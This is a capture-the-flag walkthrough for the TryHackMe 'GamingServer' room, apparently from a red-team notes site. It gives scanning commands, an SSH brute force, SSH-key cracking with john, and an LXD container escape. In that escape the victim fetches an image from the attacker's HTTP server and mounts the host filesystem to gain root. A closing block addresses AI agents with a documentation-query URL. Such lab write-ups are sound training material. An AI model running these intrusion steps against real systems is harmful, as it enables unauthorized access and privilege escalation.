# GamingServer

**Room Link:** <https://tryhackme.com/room/gamingserver>

### Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="/files/r0kOjkF23iaNvX9ZClKQ" alt=""><figcaption></figcaption></figure>

### Scan all ports

No other ports found

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

### TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="/files/KkO4qt7X1g8nXCaaPz4n" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/XQVLByWu5KikYc01Vsk5" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/E7I87gEiyKK2MJCI5gQy" alt=""><figcaption></figcaption></figure>

### SSH port 22

Tried bruteforcing ssh with johns username and the dictionary file we found but it didn't work

**Kali**

```
hydra -l john -P dict.lst ssh://$VICTIM
```

### TCP/80 - HTTP

<figure><img src="/files/afGu0oQ98zq31Y4Ys8vj" alt=""><figcaption></figcaption></figure>

### SSH port 22

After finding the key I bruteforced that with the dictionary list found

**Kali**

```
chmod 700 secretKey
/opt/john/ssh2john.py secretKey > id_john.txt
john --wordlist=/root/dict.lst id_john.txt 
```

<figure><img src="/files/miNuXOcEwuLmv36bLlYy" alt=""><figcaption></figcaption></figure>

**Kali**

```
ssh -i secretKey john@$VICTIM
Password: letmein
```

<figure><img src="/files/7pzZb98MSoAQhnqBzmP0" alt=""><figcaption></figcaption></figure>

### Privilege Escalation&#x20;

Followed this link on lxd privilege escalation&#x20;

**Link:** <https://www.hackingarticles.in/lxd-privilege-escalation/>

**Victim**

```
id
```

<figure><img src="/files/ys0afKJzXVIvReU16VpM" alt=""><figcaption></figcaption></figure>

**Kali**

```
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81
```

**Victim**

```
cd /tmp
wget http://10.10.73.204:81/alpine-v3.18-x86_64-20230712_1453.tar.gz
lxc image import ./alpine-v3.18-x86_64-20230712_1453.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
```

<figure><img src="/files/bXDKLFkJgmcsmUqjayRR" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/gamingserver.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.